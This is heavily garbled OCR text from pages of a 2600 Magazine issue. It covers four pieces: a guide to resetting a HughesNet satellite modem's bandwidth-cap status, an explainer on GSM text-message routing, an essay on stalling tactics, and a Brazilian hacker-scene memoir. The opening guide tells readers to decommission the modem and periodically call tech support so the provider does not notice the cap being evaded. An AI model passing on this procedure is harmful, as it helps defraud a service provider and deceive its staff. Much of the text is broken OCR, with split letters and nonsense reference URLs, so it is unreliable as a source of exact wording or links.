access th i s menu wi thout any ki nd of logi n.
Basi cally, t hi s i s t he CLI of what you get by
vi si t i ng http://192.168.0.1, but i t
provi des some much more useful functi ons.
Enter i ng? i nto the command prompt wi ll
yi eld all the i nfo we wi ll need.
The HughesNet FAP i s enforced by
tracki ng the bandwi dth used by each Si te I D.
I f you ' ve never done so before, go to System
I nfo to see t hi s.
Basi cally, i t serves
as authenti cati on
that your modem
i s commi ssi oned
for servi ce. If you
have no Si te ID, access to the HughesNet
network wi ll not be granted. Now, basi cally
the goal is to reset all of the i nformat i on
stored about you at the HughesNet NOC,
so your FAP status is reset back to ni l. That
wi ll allow you to f i n i sh the download of
Debi an, RedHat, or whatever you prefer.
So, we wi ll need the help of tech support.
Thi s i s f i ne, because tech support i s your
fri end. Reconnect to your router and enter
the command rd. Thi s i s goi ng to force your
modem i nto a state of bei ng decommi s
si oned, whi ch wi ll requi re it to be recom
mi ssi oned wi th the help of tech support. Go
ahead and call 1-866-347-3292 . Gi ve them
all the i nfo they need; be honest.
The agent wi ll not check your FAP
status-i t ' s si mply not i n the scri pt. He
wi ll tell you t o go t o http : //192.168.0.1/
-f s/regi s tration/sctup . html and cli ck
"Re-Regi ster. "Conti nue t hrough the prompts
unti l the modem reboots. After it does so, let
it si t, watch the status at lt tp: / / 192.168.0.1,
and let it update. When i t ' s done updati ng,
go ahead and check the FAP status. It should
now say "NO. " That means sweet, unme
tered freedom. Smi le and watch as your
connecti on goes from 2 . 2 kb/s t o 200. 2 kb/s,
and smi le bi gger wi th that ni ce fat down
load si tt i ng i n your download folder. Redo
t hi s as needed, but remember to call tech
support every few ti mes that you need to do
i t; that way Hughes wi ll see that there are
i ssues wi th your servi ce and that you aren' t
decommi ssi oni ng your modem f or f un.
Shouts t o h3xis, who taught me about
firmware, showed me how to hack Tomato,
and introduced me to 2600.
Page 12
2600 Magazine
Hel l o, and greetings from the Central Office!
After an unusua l l y col d and rainy winter here in
t he Pacific Nort hwest, s ummer is in fu l l swing.
With so l ittl e good weather in this part of the
worl d, peopl e head outdoors and make t he most
of it - even with gasol ine hovering near $5 per
ga l l on.
For many young peopl e, this means it ' s time
for noisy outdoor concerts, which I ' m tol d are
even l ouder t han our dicsel backup generator
here at t he Centra l Office. At a huge music
festiva l with sound systems approaching t he
decibel l evel of H 737 ta king off, how do you
find your friends! I ncreasingl y, t ext messages are
the sol ution.
You may not think about it much when you ' re
sending " HEY CRACK DAWG WHERE U '' to
your friend, but sending and receiving sma l l kxt
messages is incredibl y compl ex - in fact, much
more compl icated t han emai l . Making matters
worse, t here are mu l tipl e versions of SMS, and
mu l tipl e technol ogies invol ved in mobil e phone
systems (for exampl e, CDMA I S-95, CDMA2000,
GSM CSD, and GSM GPRS) . For this Mticl e, I ' l l
focus o n GSM networks, which are operated by
AT&T and T-Mobil e ( al ong with some s mal l er
regiona l ca rriers such as Edge Wirel ess) in t he
u.s.
Text messages a re governed by t he Short
Message Service (SMS) standar d. This is current l y
defined as part of t he European Tel ecommu nica
tions Standards I nstitute ( ETSI ) GSM 03. 38 stan
dard. I t incorporates, by reference, t he MAP part
of t he Signa l ing System 7 (SS7) protocol . The
specification a l l ows for 1 40 byte messages. I n
Nort h America, this t rans l ates t o 1 GO characters
because the character set used is l imited to 7-bit
ASCI I characters. In Unicode dl phabets (such as
Arabic, Chinese, or Cyril l ic), where characters
are two bytes apiece, SMS messages can onl y
be 70 characters i n l engt h . Whichever al phabet
you use, l arger messages are genera l l y spl it
apart to be del ivered ( and bil l ed) as mu l tipl e
text messages. However, because additiona l
meta data is required to accompl ish this, the size
of each message is reduced hy six hytes (seven
ASCI I characters) .
To understand how H SMS message i s del iv
ered, it ' s important to first understand a l itt l e
about how GSM switching works. So, here' s a
crash course.
HlR
When you sign up for service, you r phone
number, the I MSI fr om your SI M card, and infor
mation about t he capabil ities of your account
are input i nt o the Home Location Register
( HLR) . This is a database operated by your wire
l ess car rier, and it l argel y control s what your
handset i s both a l l owed and configured t o do
on the networ k ( e.g. pl ace and receive ca l l s,
send and receive text me,sages, forward ca l l s to
voicemail , use data services, and so fort h) . The
HLR al so keeps ( approximate) track of your l oca
tion on t he networ k, in order to del iver ca l l s and
messages appropriatel y. I n genera l , each wire
l ess car rier operates one HLR topol ogy, and l arge
car riers spl it up s ubscribers between HLR nodes.
The HLR is t he nerve center of a wirel ess car rier,
and if it fail s, a very bad day is guar anteed for
the person who administers it. At a minimum,
nobody wil l be abl e to receive i ncomi ng phone
cal l s, text messages wil l be del ayed, ca l l s wil l not
forward to voicemail , and sel f-important peopl e
in SUVs everywhere wil l be unabl e t o use t heir
B l ackBerrys whil e r unning over ol d l adies in
crosswa l ks. So, as you might imagine, an HLR
outage means t he car rier may l ose t housands
of dol l ars per minute. Fort unatel y, redundancy
and fai l over capahil ity are fairl y sophisticated.
For exampl e, Nortel ' s NSSI9 pl atform a l l ows for
both l ocal and geographical redundancy. HLR
databases t hemsel ves are al so designed with a
high degree of redundancy and faul t tol erance,
a l l owing rapid recovery in the event of fail u re.
MSC
An MSC is a Mobi l e Switching Center. I n
effect, this i s a Centra l Office for mobil e phones.
However, u n l ike traditional wirel ine Centra l
Offices, which genera l l y cover onl y one city ( or
in l arge cities, as l itt l e as one neighborhood),
MSCs genera l l y cover an entire region . These
incorporate a l l of the functional ity you woul d
expect from a modern Centra l Office, a l ong with
a l ot of whiz-bc,ng features specific to mobil e
phone appl ications ( such as the VLR described
bel ow) .
MSCs can be eit her l ocal or gateway MSCs. A
gateway MSC is ana l ogous to a t andem switch,
and can commu nicate fu l l y with other wirel ess
and wirel ine networks. A l oca l MSC is anal ogous
to a l oca l switch, al though t hese switches can
Summer 2008
Pa
g
e 13
often route direct l y to the PSTN ( and increas
ingl y, VolP networks) for voice cal l s .
VLR
Your mobi l e phone wil l general l y be regi s
tered in the Vi sitor Location Register ( VLR) of the
Mobi l e Switching Center (MSC) serving the area
in which it is l ocated ( al though the HLR does not
necessari l y have to be decoupl ed, so in s mal l er
GSM systems t he VLR may be the same as t he
HLR) . The VLR retrieves a l ocal copy of your
subscriber profi l e from t he HLR, s o most rout i ne
quer i es can be processed against t he VLR rather
than t he HLR. This mi n i mi zes l oad on s l ow and
expensive inter-carrier SS7 ( and somet i mes even
X. 2S) l i n ks and the HLR servers. These systems
are al so des i gned with a hi gh degree of faul t
tol erance, because it's al so bad i f they fai l .
However, t h e fai l ure of a VLR wil l cause on l y a
l ocal ized outage. Fai l ed cal l s wil l general l y be
forwarded to voicemai l i n t he inter i m, and SMS
messages wil l be hel d for del ivery unti l t he VLR
is again operational .
MXE/MC
The MXC ( al so referred to as MC) handl es
messaging. On GSM systems, th i s inc l udes
voi cemai l , SMS, and fax features (yes, the GSM
standard i ncl udes sending and receiving faxes
for some reason) .
SMSC
Hey, we final l y got to the piece that rea l l y
matters. The SMSC is the component of t he MXE
which handl es SMS originat i on and termi nation.
SMS messages s ent or received genera l l y pass
from your handset to t he MSC to t he MXE to the
SMSC, and t hen ei t her i n t he reverse direct i on
(for on-networ k SMS) or t o t he gateway MSC for
i nter- car r i er del ivery.
Message flow
I ' m a vi sual person, so here' s a vi s ual depi c
t i on of how an SMS i s senl . Read i t from l eft to
r i ght:
Figure 1: Mobile SMS Origination
Di,l
g
ram drawn b
y
Carre
Note t hat t he SMS protocol accou nts for t he
unrel i abi l i ty of wi rel ess networks by usi ng an
acknowl ecment sequence.
Next, here' s a visual depiction of how your
phone receives SMS messages from the network.
Read i t from right to l eft:
Figure 2: Mobile SMS Termination
Diagram drawn b
y
Carre
Note t hat the
a
cknowl edgment sequence is
al so end-to-end, as i n Figure 1 .
Bi l l i ng
Wh i l e t he GSM standard defi nes how the
SMS protocol works and t he data structures
associated with i t, bil l i ng is l eft up to the carriers.
This is a contentious issue, particu l ar l y over
seas where carriers do not charge for receiving
SMS messages. Un l ike emai l , SMS is bil l ed per
message, and carri ers wi l l general l y not del i ver
messages unl ess they have a bi II i ng arrangement
wi t h the origi nati ng carrier. Th i s has given rise
to inter-carrier SMS provi ders, such as VeriSign,
who negotiate whol esal e bil l ing arrangements
on behal f of car r i ers. Genera l l y, i n t he absence
of a bil l i ng arrangement, carri ers wi l l refuse
del i very of SMS messages. This i s a particu l ar l y
gl ar i ng i s s ue when us i ng SMS short codes. For
exampl e, the popu l ar 8762 (UPOC) short code
i s not ava i l abl e t o Spr i nt subscr i bers, because
Spri nt l acks a b i l l i ng ar r angement wi t h Dada ( the
owner of Upoc).
Wel l , i t ' s t he end of my sh i ft here i n t he
Centra l Offi ce, so enjoy the rest of your s ummer
and pl ease wear ear pl ugs i f you dance near t he
bi g speakers. I nstead, save your hear i ng for The
Last HOPF i n New York, wherp I ' l l be speaki ng
t hi s yparl
References
. i w . | ' ` .:|/ i !
%H: cHoTe:,;/ ) . | | J ' ..' 0 Th i s message board
thrfad provi des a dptai l ed descripti on and l i sting
of the SMS ch,nactcr scI.
. ` '. /
%W l J | |I |/:. / 1 1 . j+ l
Nortel white paper for the NSS19 IIL R pl atform.
http://'v'W.C- 'V('tlt.helix .C()H\/ . ' !
%`" /TclcculII/ Dptai l ed fl owcharts
common GSM ca l l f l ows ,md sequences.
hLtp:i/cn .wikipc'c-d.()t / _ LkL
%:1 ` Wel l - wr i tten Wi ki ppdia art i cl e
outl i n i ng consumer sprvices ava i l abl p on GSM
networks.
Pa
g
e 14 2600 Ma
g
azine
by Barrett Brown
"hol di ng" (hol 'dil)
1. i n certai n sports, the i l l egal use of the hands
and arms t o hi nder the movements of an
opponent
"act i on" (ak'/an)
1. the effect produced by somethi ng.
2. a) a mi l i tary encounter
b) mi l i tary combat i n genera l
Everyone i s fami l i ar wi th what hol di ng
acti ons are; we experi ence them every day of
our l i ves. What many peopl e may not know
i s that hol di ng acti ons can be very carefu l l y
pl anned usi ng stati sti cs, maki ng them a
powerfu l tool of mani pul ati on.
Fi rst, l et ' s acquai nt oursel ves more
speci fi cal l y wi th what a hol di ng act i on i s.
Scenar i o One: Let ' s say, for exampl e, that
you are tryi ng to get a refund for some sma l l
i tem you bought but whi ch you recei ved i n
the mai l broken. The i tem cost $30. 00, but
you pai d for i t, and you want to get what you
pai d for. You ca l l the company and a re greeted
by a phone tree. The phone tree is the fi rst step
i n the company' s hol di ng acti on agai nst you .
You spend forty mi nutes navi gat i ng around the
tree, and you fi na l l y reach a customer servi ce
representati ve, who i nforms you that i n order
to get a refund or exchange, you need to have
the ori gi nal recei pt, fi l l out some forms they
send you i n the mai l , and send your i tem back
to them. You wai t for your forms i n the mai l ,
but three weeks l ater they haven't come. So
you spend another forty mi n utes on the phone
tree to reach a nother representati ve, who
apol ogi zes and says the forms wi l l be sent to
you . Th i s step can be repeated as many ti mes
as necessary unti l you get so ti red of wasti ng
your t i me that you j ust gi ve up on the refund
ent i rel y. Thi s i s an exampl e of a successfu l
hol di ng act i on by the company aga i nst you.
Through t he use of phone trees and red tape,
the company avoi ded spendi ng money on
you. I n fact, because t i me i s equal to money
i n most peopl e' s l i ves, they made you spend
even more money.
Scenar i o Two: Now l et ' s say, compl etel y
hypothet i ca l l y, that you are an Ameri can
presi dent. Oh, I don ' t know, how about
Ronal d Reagan . And you are two weeks away
from your re-el ecti on day. Somethi ng bad
comes out i n the news-for exampl e, Reagan
mol ests a Gi r l Scout-that threatens your
numbers i n t he pol l s, and you need t o di stract
the publ i c j ust l ong enough to ensure your
re- el ect i on. There happen t o be US pr i soners
of war i n I ran, and you make a secret deal wi th
the I rani ans that i f they rel ease the hostages
the day after re- el ecti on, you wi l l gi ve them
some guns or drugs or someth i ng. Then you
go on TV and promi se that i f you get el ected,
the hostages wi l l be rel eased. Th i s i s another
form of hol di ng acti on whi ch uses the medi a.
The presi dent does not need t o prove t he Gi r l
Scout wrong or cl ear hi s own name. He j ust
needs to hol d the peopl e' s attenti on for two
weeks, unti l he gets re-el ected. Di stract i on
hol di ng acti on.
Scenar i o Three: You are a homel ess heroi n
addi ct. You are sent t o j ai l for a cr i me you di d
not commi t. Wh i l e i n t he ci ty j ai l , awai t i ng
tr i al , you are i n excruci ati ng agony because
your body is sufferi ng from opi ate wi thdrawal .
Every day that you are i ncarcerated i s a day
i n agony. Your publ i c defender tel l s you that
you can pl ead gui l ty and get out i n two days,
or you can fi ght to prove you r i nnocence,
whi ch wi l l take months. You are caught in a
hol di ng acti on ( as wel l as a hol di ng cel l ) , a nd
most peopl e i n these condi ti ons fol d u nder the
pressure.
Hol di ng acti ons are used on us every day,
i n ever- i ncreas ing numbers. Maj or compa n i es
actua l l y have stati sti cs whi ch tel l them exact l y
what percentage of customers wi l l hang up
or reach the wrong person when ca l l ing an
automated phone tree, and they count on
those numbers. They save money wi th every
customer that does not reach them, or so thei r
l ogi c goes. The mai n commodi ty whi ch a
hol di ng acti on mani pul ates is t i me. Whether
we rea l i ze i t or not, t i me i s money, a nd s i nce
corporati ons, pri vate i nterest groups, and
wea l thy i ndi vi dual s have much more money
and ti me than the average person, these l arge
Summer200B
Pa
g
e 15
enti ti es wi l l al ways wi n any gi ven hol di ng
acti on.
Let's exami ne scenari o two aga i n . A
customer i n th i s scenari o who i s somewhat
poor may not have forty mi nutes to spend on
a phone tree. Ei ther t hey are busy worki ng for
mi ni mum wage, or they arc spendi ng t hei r
free t i me doi ng l aundry and shoppi ng. A poor
person often does not have the ti me to spend on
red tape and wi l l give up ear l y, t hus savi ng the
mani pu l ati ve enti ty i n questi on from repl aci ng
thei r defecti ve product. A wea l thy i ndi vi dual
i n scenari o two woul d have more t i me t o wai t
on hol d, or even a secretary to make the ca l l
i nstpad, t hus i ncreasi ng the cha nces that they
wi l l end up gett i ng what they pa i d for.
Now that we understand a l i tt l e about how
hol di ng acti ons are used aga i nst us, l et ' s th i nk
about how they ca n be used to our advantage.
The bas i c i dea i s to sta l l for as l ong as possi bl e
u nti l your enemi es ei ther gi ve up, forget or
l ose the paperwork regardi ng you, or deci de
that i t i s cost i ng them too much money, or
u nti l you are i n a better posi ti on to resol ve the
matter.
The poor sou l i n scenari o three cou l d have
fought hi s own hol di ng acti on by i nsi st i ng
on a tr i al , but not a speedy one. The j udi ci al
system i n t he u.s. functi ons pri mari l y on to
"pl ea-barga i ns, " whi ch are dea l s made wi th
the Di stri ct Attorney. Most courts have no
i nterest i n tr i al s because they cost too much
money and t i me. So i n the case of scenari o
three, ass umi ng the charge was sma l l and
the person had no pri or record, they coul d
i ns i st on a tri a!' I t woul d take a few months,
but chances are good that the charges wou l d
be dropped when t he DA real i zed t hat thei r
own hol di ng acti on was not worki ng. A fr i end
of mi ne di d exact l y thi s, goi ng t o court every
month for three years, sta l l i ng the case. Every
month the DA wou l d offer a new dea l , and
every month my fri end wou l d say, " I want a
tri a!. " F i nal l y, after they had postponed the
tri a l to the farthest poss i bl e l egal ti me l i mi t,
the DA made one l ast offer, whi ch was fair.
Have an ugl y l ooki ng credi t report ? F i l e a
di spute on every si ngl e bad mark you have.
Compani es, especi al l y credi tors, are routi nel y
bought by other compani es, and many ti mes
paperwork or data i s l ost i n the transi t i on. When
you di spute a cl ai m on your credi t report, the
burden of proof i s on the company. They onl y
have a l i mi ted amount of t i me to prove that
you owe them money, or they have to drop the
cl a i m from your report. Because these compa
ni es are so busy, i t i s very common for cl ai ms
to be dropped s i mpl y because the credi tor di d
not have t he ti me to fi nd your fi l e and send
i t to the credi t report i ng agency. I n addi t i on,
i f your cl a i m i s sma l l , i t costs the company
more money t o prove that you owe them t han
i t does t o j ust drop t he whol e matter. Th i s i s
us i ng a hol di ng acti on to your advantage.
Another exampl e is l aws ui ts. Part of the
reason why l arge compan i es routi nel y sett l e
stupi d l awsu i ts for l argE s ums of money i s that
they are aware of how much more money,
ti me, and publ i ci ty it wou l d cost them to go
to tri a!'
Ti me and i nformati on are the two most
i mportant commodi ti es i n our worl d today. The
more i nformati on you have about your oppo
nent and about how thei r t i me i s a l l ocated, the
better your abi l i ty to contri ve ways to di stract
your opponent from us i ng t i me aga i nst you.
The more control you have over an opponent ' s
ti me, t he l ess they have over yours. The ever
growi ng compl exi ty i n bureaucraci es, ai ded
by the growth of technol ogy, ensures that
mani pul at i ng peopl e' s ti me i s a trend wh i ch
wi l l onl y conti nue to grow and be refi ned i n
the years t o come. The more you are aware of
thfsf processes, t hE bettEHqu i pped you wi l l
be to use them to your advantage.
Thi r t e e n Ye ar s
St ar t i ng a Bac ke r
o f
Sc e n e
by Derneval Ri bei ro Rodri gues da Cunha together, so they cou l d exchange i nformati on.
I had t o have peopl e t o tal k about. They had
For those of you who don ' t remember me, to know about hacki ng. I had to spread the
I ' m the one who wrote "Hacki ng i n Braz i l " and word for that to happen, so that peopl e a l l
"Start i ng a Hacker Scene. " Maybe one or two around Braz i l -those that deserved to be cal l ed
of you have heard of Brazi l i ans on the i nternet. "hackers"-woul d know what i t was a l l about
Unfortunatel y, there are a great many of them and hol d meeti ngs. Later on, the t hi ng wou l d
cal l i ng themsel ves hackers and defaci ng be t o prepare for a Braz i l i an hacker conference.
websi tes. No, I ' m not the one who bul l s h i tted So I started the easi est way: by starti ng an el ec-
those guys i nto doi ng el ectroni c vandal i sm. troni c publ i cati on. Thi s was when everybody
What I di d was to start wri ti ng the fi rst Braz i l i an was j ust starti ng t o know about t he i nternet, j ust
hacker ezi ne i n 1994. The i nternet was n' t avai l - before Braz i l i ans cou l d get commerci al i nternet
abl e back then-peopl e cou l d onl y l earn about access. My ezi ne was the fi rst on the scene.
i t at uni versi ti es and i n a few other pl aces. I t My boss di dn' t fi re me when he heard about
j ust so happened that I di d know about i t. And my pl ans; he u nderstood t hi ngs. But everywhere
there I l earned about hacker eth i cs, vi ruses, I heard of, a bunch of peopl e j oi ned and started
phreaki ng, and a l l that stuff. I was i nvol ved t hi ngs. I , though, had to start on my own. I
i n sett i ng up an ecol ogy I nternet di scussi on borrowed art i cl es from the publ i c domai n here
among el ementary school s. Then I heard about and there, asked for permi ssi on to publ i s h t hi s
a "Hacker and Vi rus Congress" i n Buenos Ai res, or that, someti mes rewrote t hi ngs, and di d some
Argenti na. I t ran for about four days, whi ch I wri ti ng on my own. Some of the stuff was so
used to l earn and tal k wi th peopl e from Hackti c good that i t' s sti l l publ i shed today wi thout my
and 2600 and wi th several Argenti ne peopl e permi ssi on or anyth i ng el se. And, even today, I
connected wi th computer secur i ty, among haven' t compl etel y deci ded i f I shou l d sue the
other t hi ngs.
guys that di d i t. There were peopl e who bought
Few peopl e i n South Ameri ca had I nternet books because my art i cl e was i n them.
accounts. Most t hi ngs happened i n BBSes, on Thi ngs worked j ust fi ne for the publ i ca-
Fi donet or the l i ke. Computer vi r uses were t i on. My choi ce of wri ti ng in pure ASCI I code
the mai n s ubj ect when peopl e tal ked about hel ped i t to be upl oaded to and downl oaded
computer i nsecuri ty. But they generated a from i n BBSes a l l around the country and
l ot of press coverage i n those days. I t was, abroad, in Portuguese-speaki ng pl aces l i ke
though, very di ffi cul t to get any i nformati on Portugal and Mozambi que. Barata Eletrica
about anyth i ng l i ke "dark subj ects." Mysel f, I ( "Electric Cockroach") spread everywhere l i ke
had to hack my way i nto an academi c i nternet a di sease. It appeared i n pl aces l i ke Usenet,
account. I di d t hi s l egal l y, not by us i ng some- l i ke the 2600 l i st and soc . cul ture . bra z i l .
body el se' s account. I ' m not goi ng to tal k Mysel f, I made i t avai l abl e for down-
about bad connecti on l i nes; phone modems l oad from the EFF and etext . argo Check
were everyth i ng but rel i abl e. ( I wrote about Googl e for the current web address or vi si t
th i s i n "Braz i l i an Phone System. ") I ' m tal ki ng barat ael et ri ca . c j b . net . The peopl e from the
about peopl e us i ng 600 bps, maybe 1 200 computer sci ence facul ty of a federal u n i versi ty,
bps, someti mes 2400 bps modems. I nstead of UFSC, kept a mi rror on thei r websi te for about
downl oadi ng bi g fi l es from a BBS, you ' d rather a decade-and I ' ve never set foot there; thanks
choose the fi l es fi rst, then go there yoursel f wi th to them! At my own Uni vers i ty of Sao Pu l o,
fl oppi es to pi ck them up. I mysel f wou l d use they wou l d not hear a thi ng about it; i n fact,
the i nternet onl y from u ni versi ty computers; I they hated me. I al most l ost my access there but
never had to use di al -u ps to access anythi ng. got i t back months l ater.
Computer students themsel ves di dn' t know Soon peopl e started to wri te other, more
much about it except what they l earned from aggressi ve publ i cati ons, l i ke the ezi ne Axur 05,
movi es l i ke Wargames. That was in the second Nethack, and a few others, most l y on BBSes.
bi ggest u ni versi ty i n South Ameri ca. Those were That was at the ti me of Mi tni ck' s arrest. If
the "gol den years. " someone wanted to be known as a hacker, he
So, what was my goa l ? J ust to get peopl e and hi s fri ends wou l d wri te an ezi ne. Lots of
Summer 2008 h
g
e 17
good i nformati on started to be spread around, the paper press started to r un art i cl es teach i ng
l i ke phi l es about how t o get free phone cal l s bad t hi ngs for fu n. i ssue of the now-defunct
i n the Brazi l i an phone system. (They eventua l l y Brazi l i an edi ti on of Internet World su rpri sed me
fi xed that. ) i n that way. Mostl y, i t had arti cl es tel l i ng every-
The ezi ne grew qu i t compl ex. For one t hi ng, th i ng about hackers ' bad deeds. Put together,
I started to enj oy wri ti ng. It became more than a the arti cl es gave knowl edge about how to nuke
hobby. It al ways took more ti me to wri te t hi ngs. other PCs. My good l uck was I decl i ned an
And i f I cou l d not enjoy readi ng i t mysel f agai n, i ntervi ew. Maybe I wou l d have been consi d-
I wou l d rewri te the arti cl e. The ezi ne, ori gi na l l y ered part of the group. Other magazi nes al so
meant to be someth i ng s i mpl e, grew compl ex, di d s i mi l ar arti cl es. Some guys started to wri te
wi th secti ons l i ke a FAQ, about, h i story, better books usi ng materi al from the ezi nes. And these
arti cl es, and a news secti ons that was so books were a h i t, even i f t hi ngs in there di dn' t
troubl esome t o make that I turned i t i n a bl og work anymore. I can trace today' s Brazi l i an
(baraLael eL ri ca . blogspol . cou) . I f I wrote el ectroni c vandal i sm back to those mags and
someth i ng, there wou l d be a reference or a l i n k books.
sayi ng where I took i t from. My "hacker" congress never came off. The
Peopl e started offeri ng servi ces l i ke how to i nternet was spreadi ng fast, but I di dn' t have
i mprove my HTML ( i t sucks) and easy access a computer sci ence degree. My knowl edge
of the web si te-for free. I dec l i ned. I started i t was mostl y Uni x-based, and i t was qu i ckl y
al l al one; nobody wanted t o spare ti me t o hel p deval ued. Li ke most di nosaurs, I di dn' t bel i eve
me. Once I was famous, who cares? Besi des, i n a commerci al I nternet. Maybe i t was a bad
a better ezi ne wou l d i nvol ve gett i ng more th i ng that I was n' t money dri ven. I nstead of
compl ex. My focus was n' t i n del i veri ng better sett i ng up an enterpri se, I enrol l ed in a post-
t hi ngs to the growi ng number of peopl e who graduate course. Don ' t th i n k that the peopl e
were gett i ng I nternet access. The way i t was, I who started Yahoo! were more gi fted than me. I
was gett i ng th ree or four l etters a day aski ng, took my motto "I l ogi n therefore I am"-check
"Can you teach me hacki ng?" Googl e; I sai d i t fi rst-and began to gather a l l
I cou l d have gone corporate. But I wou l d my experi ences wi t h t he hacker scene i nto an
have had t o charge for that. I n fact, when I academi c work.
started the ezi ne, the freeware concept was Peopl e kept pressi ng me to wri te a book
not understood. For me, i t meant that I wou l d about al l my expl oi ts rather than a thesi s. And
not have t o worry about payi ng wages, taxes, the fact i s that I col l ected enough data to wri te
revenue, i ncome, consumer ri ghts, and so on. a l ot about those days. I cou l d fi l l two or three
I wou l d have had to regi ster the ezi ne; then I books j ust wi th i nformati on from the ezi ne.
woul d have been a target. I f anybody sued me Some day, I ' l l do i t. But for the moment, wri ti ng
and I l ost, that wou l d have been i t. And the ki nd a book i n order t o j ust earn money woul d be
of art i cl es I publ i shed were often i n gray areas sel l i ng out. And I cou l d al ready have done that
of the l aw. I f you ' re a h i red hand, you need to even wi th a "I am a fri end of Barata EJetrica ' s
work ei ght hours a day, but i f you ' re a boss, you author" card. One ex-fri end of mi ne got hi s
work twi ce that much. US$20 debt pardoned j ust because he i ntro-
My opi ni on was qu i te respected. Among duced me to hi s credi tor-j ust l i ke that. I f I
other t hi ngs, I can say I started the ta l k about wanted to wri te about "how to hack t hi ngs, " I
Li nux i n Brazi l . Phi ber Opt i k came here; I tol d cou l d have done i t much ear l i er. I maybe even
everybody to ask hi m to compare Wi ndows cou l d have earned cash doi ng l ectu res some-
secur i ty versus FreeBSD. Newswri ters di d not where, and got a Masters degree. I cou l d al so
know anyth i ng about i t. I was al so there to gi ve s i mpl y have stopped hacki ng and got a good
support when an acti vi st from Amnesty I nterna- j ob i n computer secur i ty. But, one can' t wri te
ti onal , Fernanda Serpa, started the "Free Kevi n a thesi s and do computer securi ty at t he same
Mi t ni ck" movement i n Braz i l . Maybe I ' l l wri te ti me. And I ' m sti l l th i nki ng about it, but it has to
about it someday. When there was tal k about be outsi de Braz i l .
br i ngi ng Markoff a n d Shi momura to a US$400 I n fact, I soon found out that some peopl e
per ti cket conference t o tal k about "the pi rate were sti cki ng wi th me because of the "dark
and the samurai , " I wrote an arti cl e i n the ezi ne. si de. " Someti mes I even l ost "fri ends" because
Later on, nobody tal ked about br i ngi ng those they gave up on me wri ti ng about them. I al ways
guys here to Braz i l for a conference anymore. warned about my focus on hacker eth i cs and
My task was compl eted. The "hacker scene" the pur sui t of knowl edge. I changed my wri ti ng
had happened. I t was no dream anymore. i n order to avoi d copycats. The ezi ne i s sti l l
There were some very strong meeti ngs, 2 600 about hacki ng, but i t now takes a much broader
meeti ngs, and peopl e were tal ki ng about i t vi ew. How wou l d you teach hacki ng wi thout
everywhere. And peopl e knew the di fference usi ng computers? Hacki ng computers i s not the
between good hackers and l amers. But then onl y way to l earn about hacki ng. Some peopl e
Pa
g
e 18
2600 Ma
g
azine
promi sed me that they woul d keep on readi ng.
And I kept wri ti ng the ezi ne and a bl og because
i t' s such a waste to stop . .
I t someti mes pays off to do a bl og. Once I
posted that I needed a few memory chi ps for
my oi d-fashi oned computer. I l i ve i n Sao Pul o.
One guy from Ri o de j anei ro read i t, asked for
my postal address and sent the chi ps, al ong
wi th other t hi ngs: about 1 6 kg of hardware, a
compl ete CPU he' d made up of ol d pi eces he
gathered from fri ends. He threw a party, peopl e
br ought t hi ngs, they set up a Penti um 233 wi th
a 30 gi g HD, and they sent i t and some other
th i ngs to me, by FedEx. I cou l dn' t bel i eve i t and
sent hi m some t-s hi rts by way of t hanks. I sti l l
used that computer u nti l l ast Chr i stmas, when
a bi g fan and fri end of mi ne sent me a Pent i um
4 wi th a 1 50 gi g HD and a few sci ence fi cti on
magazi nes. Maybe that guy i s one of the thi rty
fi ve that prevent God from destroyi ng the Earth.
I don' t know.
The probl em today wi th wri ti ng a hacker
ezi ne and bl og i s that today, everybody' s got
much more access than at the t i me I started.
And there are many peopl e cl ai mi ng hacker
knowl edge. Even YouTube has a vi deo or two
about computer i nsecuri ti es. One does n' t
have t o go underground t o l earn about "dark
subjects. " One has to have the consci ence,
whi ch is the mai n subj ect about whi ch I used
to wri te, ri ght from the begi nni ng. I f you wri te
about how to do it, that wi l l get ol d soon. When
you wri te about how to thi n k about i t, i t wi l l
sti ck. Peopl e sti l l can get ol d i ssues of my ezi ne
and f i nd good thi nki ng materi a l . That mi ght
save thei r butts one day.
Unfortunatel y, I cou l d not wri te a thes i s
about what I di d. The Portuguese l anguage i s
tough t o read. My not wr i t i ng a book i s al so
somethi ng to bl ame mysel f for. How cou l d I
wri te a book about "starti ng a hacker scene"
and then get a "normal " j ob anywhere but
i n computer secur i ty? There was a "hacker"
conference i n Sao Pul o, where I l i ve. I cou l d
not go. I n t he USA or Europe, i t wou l d be no
probl em. But not here. There were l ots of TV
cameras everywhere. No way. At that ti me, I was
worki ng ri ght next to an offi ce where peopl e
were tryi ng t o sue YouTube. I even knew whi ch
books of l egi s l ati on were bei ng consu l ted.
These peopl e next door di d not know about my
past, and why shou l d they? Yet, a few weeks
ago, I attended another secur i ty conference,
YSTS. But there were fewer cameras and none
from TV.
Al so, peopl e al ways charge you more if they
know you ' re famous. For a ti me, I wou l d even
check famous peopl e for stori es about how to
deal wi th fame. I t' s no easy task, but I bel i eve
that someti me i n the future, everybody wi l l
have to l earn about i t, how to rel ate to the press
and how to use fame for a pu rpose. Peopl e on
the i nternet don ' t know th i s, and they l ose great
opportu n i ti es.
I t' s l i ke that: for one th i ng or another, you get
famous. Before you know it, i t ' s gone. Peopl e
have t o consi der t hat gett i ng famous i s no fa i ry
tal e. I n order to make some good use of it, one
has to know about i t. I f you publ i sh someth i ng
today i n YouTube or i n a bl og, i t wi l l be remem
bered somewhere, somet i me. You ' ve changed,
grown ol der, but your past i s sti l l there. j ust
l i ke it was. I was very fortunate the way I wrote
t hi ngs. I never used an al i as to wri te, and I have
no regrets about i t.
When you get famous, some peopl e get
to know you because they are gett i ng famous
at the same ti me, but i n di fferent pl aces, wi th
other occupati ons. Mauro Marcel o, who got
appoi nted the chi ef of the Brazi l i an I ntel i gence
Agency (ABI N) , di d know me. I cou l d have
i ntervi ewed h i m there and then, but that ' s
another story, and a sort of funny one. Eventu
al l y, he was ki cked off the j ob because of the
i ntri gue there, wh i ch makes me thi n k he' s not
such a bad guy; those guys from ABI N aren' t
popul ar. When he was there, he bothered to
answer an ema i l of mi ne. Who knows? Maybe
someday I ' l l contact hi m agai n. He mi ght have
some good stori es to tal k about. He was, after
al l , the fi rst Braz i l i an "Cyber" cop.
He wou l dn' t catch me, for sure. I stopped
a l l "hacki ng" when I began wri ti ng the ezi ne.
Maybe not a l l of i t, but why bother? That magi c
word "pl ease" works wonders. You j ust have to
know who to ask. If the guy does n' t know you,
j ust pl ay t hat song, " Let me pl ease t o i ntroduce
mysel f, I ' m a man. " You can ' t al ways get what
you want, but someti mes you do. I wou l d never
know how to stash t hi ngs i nsi de Uni vers i ty of
Sao Pul o computers wi thout a l i ttl e hel p from
my fri ends. I wou l d al ways s i ng "Don' t you
